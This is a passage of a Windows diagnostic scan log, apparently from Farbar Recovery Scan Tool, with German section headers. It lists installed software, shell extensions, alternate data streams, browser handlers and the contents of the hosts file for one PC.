Microsoft Office Professional Plus 2019 - en-us (HKLM\...\ProPlus2019Volume - en-us) (Version: 16.0.10416.20027 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\...\OneDriveSetup.exe) (Version: 24.226.1110.0004 - Microsoft Corporation)
Microsoft Teams classic (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Teams) (Version: 1.7.00.3653 - Microsoft Corporation)
Microsoft Teams Meeting Add-in for Microsoft Office (HKLM\...\{A7AB73A3-CB10-4AA5-9D38-6AEFFBDE4C91}) (Version: 1.24.31301 - Microsoft)
Microsoft Update Health Tools (HKLM\...\{C6FD611E-7EFE-488C-A0E0-974C09EF6473}) (Version: 5.72.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649 (HKLM-x32\...\{5d0723d3-cff7-4e07-8d0b-ada737deb5e6}) (Version: 12.0.40649.5 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40649 (HKLM-x32\...\{35b83883-40fa-423c-ae73-2aff7e1ea820}) (Version: 12.0.40649.5 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40649 (HKLM\...\{20C1086D-C843-36B1-B678-990089D1BD44}) (Version: 12.0.40649 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40649 (HKLM\...\{ABB19BB4-838D-3082-BDA4-87C6604181A2}) (Version: 12.0.40649 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40649 (HKLM-x32\...\{A8589745-51BC-3963-B4E9-201CF8693538}) (Version: 12.0.40649 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40649 (HKLM-x32\...\{DEA7F8E3-B7B9-3C3C-945B-7F8CE9041748}) (Version: 12.0.40649 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.40.33816 (HKLM-x32\...\{77169412-f642-45e7-b533-0c6f48de12f9}) (Version: 14.40.33816.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.40.33810 (HKLM-x32\...\{47109d57-d746-4f8b-9618-ed6a17cc922b}) (Version: 14.40.33810.0 - Microsoft Corporation)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.40.33816 (HKLM\...\{5904914B-9FC8-44C2-AE48-5C7F30A603EC}) (Version: 14.40.33816 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.40.33816 (HKLM\...\{560D2DA4-096E-4868-B22A-DA6418FDE6FB}) (Version: 14.40.33816 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.40.33810 (HKLM-x32\...\{5EA6C998-D5AC-4ED9-89C3-9F25B17CCD3D}) (Version: 14.40.33810 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.40.33810 (HKLM-x32\...\{0C3457A0-3DCE-4A33-BEF0-9B528C557771}) (Version: 14.40.33810 - Microsoft Corporation) Hidden
Microsoft Visual Studio Code (HKLM\...\{EA457B21-F73E-494C-ACAB-524FDE069978}_is1) (Version: 1.86.2 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 6.0.20 (x86) (HKLM-x32\...\{39139702-799e-4843-8d90-cfe9330b285a}) (Version: 6.0.20.32621 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 6.0.20 (x86) (HKLM-x32\...\{FC641ACB-FE5E-4F88-B392-9421BDCA1143}) (Version: 48.83.63194 - Microsoft Corporation) Hidden
Microsoft Windows Desktop Runtime - 8.0.4 (x86) (HKLM-x32\...\{32e2abd1-d551-490e-897a-e59b2c59be7b}) (Version: 8.0.4.33519 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 8.0.4 (x86) (HKLM-x32\...\{DC4621E6-9421-4CE6-9E5E-04126FAAA400}) (Version: 64.16.12024 - Microsoft Corporation) Hidden
MobaXterm (HKLM-x32\...\{79CD2C42-8C19-483C-9C01-FE493E289079}) (Version: 24.0.0.5204 - Mobatek)
MSEdgeRedirect (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\MSEdgeRedirect) (Version: 0.7.0.1 - Robert Maehl Software)
MTOP Client (HKLM-x32\...\{5E2CAAA1-0D66-4FD3-B162-85CC119315C6}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Node.js (HKLM\...\{6F56DDC2-C83A-4501-AB01-F81988163858}) (Version: 16.14.0 - Node.js Foundation)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 8.6.9 - Notepad++ Team)
Npcap (HKLM-x32\...\NpcapInst) (Version: 1.79 - Nmap Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.10416.20027 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.10416.20027 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0407-1000-0000000FF1CE}) (Version: 16.0.10416.20027 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.10416.20027 - Microsoft Corporation) Hidden
Online Plug-in (HKLM-x32\...\{C3E80A55-A7DC-4D65-98FA-1EA649881718}) (Version: 24.9.0.226 - Citrix Systems, Inc.) Hidden
Oracle VM VirtualBox 7.0.10 (HKLM\...\{16919967-9ED2-47C0-B86C-987992BA491F}) (Version: 7.0.10 - Oracle and/or its affiliates)
Outlook Google Calendar Sync (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\OutlookGoogleCalendarSync) (Version: 2.11.0-beta - Paul Woolcock)
Paradox Launcher v2 (HKLM\...\{8C5CF4CE-D589-40B4-A77F-01FD64602C50}) (Version: 2.4.0 - Paradox Interactive)
PDFCreator (HKLM\...\{1E0CF1C6-D640-4566-8E6F-2C2708422A25}) (Version: 4.4.2 - pdfforge GmbH)
Postman x86_64 10.8.0 (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Postman) (Version: 10.8.0 - Postman)
Python 3.10.2 (64-bit) (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\{c60fd5ac-367d-4e3a-a975-f157502ac30a}) (Version: 3.10.2150.0 - Python Software Foundation)
Python 3.10.2 Add to Path (64-bit) (HKLM\...\{F55A8CCD-A817-4C53-91B8-4B7E6C49DA7B}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Core Interpreter (64-bit) (HKLM\...\{6475B354-B0F6-4837-8738-784937D647B2}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Development Libraries (64-bit) (HKLM\...\{8277936D-8A34-4758-893C-0B29342A6F27}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Documentation (64-bit) (HKLM\...\{B51A07AD-9BCE-485D-8721-C7C83992794B}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Executables (64-bit) (HKLM\...\{EDEE3162-8399-42D4-9D7C-7DA21275BFD0}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 pip Bootstrap (64-bit) (HKLM\...\{08B7036F-0609-4634-9A5F-1688230E9D9D}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Standard Library (64-bit) (HKLM\...\{D862D299-FDC2-4571-B3A1-27CEE951D2D1}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Tcl/Tk Support (64-bit) (HKLM\...\{7863DF45-23BB-4D83-97B3-CF08F3192F5B}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Test Suite (64-bit) (HKLM\...\{D68594E9-2F98-4EA0-8A94-5D7D9FF51960}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python 3.10.2 Utility Scripts (64-bit) (HKLM\...\{300F0759-8294-4971-9FAD-7AB19FA7B270}) (Version: 3.10.2150.0 - Python Software Foundation) Hidden
Python Launcher (HKLM-x32\...\{0CD41B07-EDF9-4B77-8C7C-CCCA1C435970}) (Version: 3.10.7686.0 - Python Software Foundation)
QNAP Qsync Client (HKLM-x32\...\Qsync) (Version: 5.1.1.0830 - QNAP Systems, Inc.)
Raspberry Pi Imager (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Raspberry Pi Imager) (Version: 1.8.5 - Raspberry Pi Ltd)
Realtek USB Audio (HKLM\...\{0A46A65D-89AC-464C-8026-3CD44960BD04}) (Version: 6.3.9600.250 - Realtek Semiconductor Corp.)
RealVNC Viewer 7.10.0 (HKLM\...\{8B27D0E9-9C84-4384-AF24-5C543C796381}) (Version: 7.10.0.52294 - RealVNC)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version: - Riot Games, Inc.)
Self-Service Plug-in (HKLM-x32\...\{BD2822BC-6B66-4B8C-AE77-E3009471FCA5}) (Version: 24.9.1.86 - Citrix Systems, Inc.) Hidden
Signal 5.62.0 (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\7d96caee-06e6-597c-9f2f-c7bb2e0948b4) (Version: 5.62.0 - Signal Messenger, LLC)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SteelSeries GG 28.2.0 (HKLM\...\SteelSeries GG) (Version: 28.2.0 - SteelSeries ApS)
TeamViewer (HKLM\...\TeamViewer) (Version: 15.57.5 - TeamViewer)
tiptoi® Manager 5.2 (HKLM\...\{833392BB-E8C0-4066-9408-3A30FA43972F}_is1) (Version: 5.2 - Ravensburger AG)
VALORANT (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\Riot Game valorant.live) (Version: - Riot Games, Inc)
ViGEm Bus Driver (HKLM\...\{869109FC-8D5A-46D0-B619-47D7E4173D93}) (Version: 1.16.115 - Nefarius Software Solutions e.U.)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.18 - VideoLAN)
WhatsApp (Outdated) (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\WhatsApp) (Version: 2.2326.10 - WhatsApp)
Windows SDK AddOn (HKLM-x32\...\{E18618EC-D9DB-4BCE-B382-85ADA2CBB340}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Subsystem for Linux (HKLM\...\{9123DBDC-D242-4A68-9E97-841E2A788E7C}) (Version: 2.3.26.0 - Microsoft Corporation) Hidden
Windows Subsystem for Linux Update (HKLM\...\{36EF257E-21D5-44F7-8451-07923A8C465E}) (Version: 5.10.16 - Microsoft Corporation)
Windows*11-Installationsassistent (HKLM-x32\...\{115DF11E-4B4C-4EA9-9A79-00DB0C7EF02D}) (Version: 1.4.19041.3630 - Microsoft Corporation)
Windows-PC-Integritätsprüfung (HKLM\...\{A5F151BA-B6DF-4659-83C0-13692B76634F}) (Version: 3.9.2402.14001 - Microsoft Corporation)
Wireshark 4.4.2 x64 (HKLM-x32\...\Wireshark) (Version: 4.4.2 - The Wireshark developer community, hxxps://www.wireshark.org)
Zoom (HKLM\...\{E5F9EFAB-11E7-48E4-B8E7-B3614E5FFCE0}) (Version: 5.9.3169 - Zoom)

Chrome apps:
============
Horizon TV (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\40e086a192918ecee8ef0aacbeb33e8e) (Version: 1.0 - Google\Chrome)
kitaplus Eltern-App (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\760d5e85cd93ae9d0ee4f7ded7868fdb) (Version: 1.0 - Google\Chrome)
Sheets (HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\8ebb79ee4871db32937e17d29a25dd81) (Version: 1.0 - Google\Chrome)

Packages:
=========
Adobe Acrobat Reader -> C:\Program Files\Adobe\Acrobat DC [2024-12-13] ()
AMD Radeon Software -> C:\Program Files\WindowsApps\AdvancedMicroDevicesInc-2.AMDRadeonSoftware_10.21.30024.0_x64__0a9344xs7nr4m [2024-04-25] (Advanced Micro Devices Inc.) [Startup Task]
Dolby Audio Premium -> C:\Program Files\WindowsApps\DolbyLaboratories.DolbyAudioPremium_3.20500.501.0_x64__rz1tebttyb220 [2022-02-28] (Dolby Laboratories)
Notepad++ -> C:\Program Files\Notepad++\contextMenu [2024-10-12] (Notepad++)
SmartAudio 3 -> C:\Program Files\WindowsApps\22094SynapticsIncorporate.SmartAudio3_1.0.85.0_x64__qt57b6kdvhcfw [2022-05-19] (Synaptics Hong Kong Limited, Taiwan Branch (H.K.))
Synaptics TouchPad Control Panel -> C:\Program Files\WindowsApps\SynapticsIncorporated.SynapticsControlPanel_19005.19089.0.0_x64__807d65c4rvak2 [2024-12-18] (Synaptics Incorporated)
Synaptics Trackpoint Control Panel -> C:\Program Files\WindowsApps\SynapticsIncorporated.241916F58D6E7_19005.19089.0.0_x64__807d65c4rvak2 [2024-12-18] (Synaptics Incorporated)
WinAppRuntime.Main.1.5 -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Main.1.5_5001.311.2039.0_x64__8wekyb3d8bbwe [2024-11-13] (Microsoft Corp.)
WinAppRuntime.Singleton -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Singleton_6000.318.2304.0_x64__8wekyb3d8bbwe [2024-11-19] (Microsoft Corp.)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1775496863-3233068474-2158662417-1002_Classes\CLSID\{38142727-3008-9161-1521-349515000000}\localserver32 -> C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe (Adobe Inc. -> Adobe)
CustomCLSID: HKU\S-1-5-21-1775496863-3233068474-2158662417-1002_Classes\CLSID\{57D0E8CF-2552-4B76-A5C4-B1E9D413FD14} -> [Qsync] => C:\Users\Lisa\AppData\Local\QNAP\Qsync\Quick Access [2022-02-28 20:57]
CustomCLSID: HKU\S-1-5-21-1775496863-3233068474-2158662417-1002_Classes\CLSID\{9107EB34-31A0-4430-A1DD-C5E81E54DB1B} -> [QNAP Qsync Client: Roell-NAS-01 (Qsync)] => C:\Users\Lisa\Qsync [2022-02-28 20:58]
ShellIconOverlayIdentifiers: [ QsyncEx_Icon1] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ShellIconOverlayIdentifiers: [ QsyncEx_Icon2] -> {78BEB65D-D83B-4C30-8E05-2833458A55A4} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ShellIconOverlayIdentifiers: [ QsyncEx_Icon3] -> {DD7A6BC5-2ADD-48F2-83AE-9735C22220FA} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ShellIconOverlayIdentifiers: [ QsyncEx_Icon4] -> {68580D39-71D8-4196-BC7A-0CFE3B90E38A} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ShellIconOverlayIdentifiers: [ GoogleDriveCloudOverlayIconHandler] -> {A8E52322-8734-481D-A7E2-27B309EF8D56} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [ GoogleDriveMirrorBlacklistedOverlayIconHandler] -> {51EF1569-67EE-4AD6-9646-E726C3FFC8A2} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [ GoogleDrivePinnedOverlayIconHandler] -> {CFE8B367-77A7-41D7-9C90-75D16D7DC6B6} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [ GoogleDriveProgressOverlayIconHandler] -> {C973DA94-CBDF-4E77-81D1-E5B794FBD146} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.) ShellIconOverlayIdentifiers-x32: [ GoogleDriveCloudOverlayIconHandler] -> {A8E52322-8734-481D-A7E2-27B309EF8D56} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.) ShellIconOverlayIdentifiers-x32: [ GoogleDriveMirrorBlacklistedOverlayIconHandler] -> {51EF1569-67EE-4AD6-9646-E726C3FFC8A2} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.) ShellIconOverlayIdentifiers-x32: [ GoogleDrivePinnedOverlayIconHandler] -> {CFE8B367-77A7-41D7-9C90-75D16D7DC6B6} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.) ShellIconOverlayIdentifiers-x32: [ GoogleDriveProgressOverlayIconHandler] -> {C973DA94-CBDF-4E77-81D1-E5B794FBD146} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.) ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert] ContextMenuHandlers1: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.) ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2021-11-18] (pdfforge GmbH -> pdfforge GmbH) ContextMenuHandlers1: [QsyncExt] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. 
-> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers4: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ContextMenuHandlers4: [QsyncExt] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ContextMenuHandlers5: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\101.0.3.0\drivefsext.dll [2024-12-17] (Google LLC -> Google, Inc.)
ContextMenuHandlers5: [QsyncExt] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-12-26] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers6: [QsyncExt] -> {17affcaf-2e65-4b1b-98a1-a7b3b4d8ad36} => C:\Program Files (x86)\QNAP\Qsync\QsyncExt.dll [2022-09-23] (QNAP Systems, Inc. -> )

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

==================== Verknüpfungen & WMI ========================

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2022-05-19 15:47 - 2022-05-19 15:47 - 000181248 _____ (pdfforge GmbH) [Datei ist nicht signiert] C:\WINDOWS\System32\pdfcmon.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\ProgramData\ChrEdgeFkOff.vbs:F4FC0A6059 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk:A1B76439FE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arduino.lnk:34D926B811 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Barrier.lnk:306D5B6041 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk:B96E9B8455 [3442]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) =============

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2024-10-11] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2022-02-28] (Microsoft Corporation -> Microsoft Corporation)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2021-06-05 13:08 - 2024-07-02 20:42 - 000000978 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 kubernetes.docker.internal

2022-03-01 17:52 - 2024-04-26 07:54 - 000000432 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics
172.17.144.1 E595.mshome.net # 2029 4 3 25 6 54 29 812

==================== Andere Bereiche ===========================

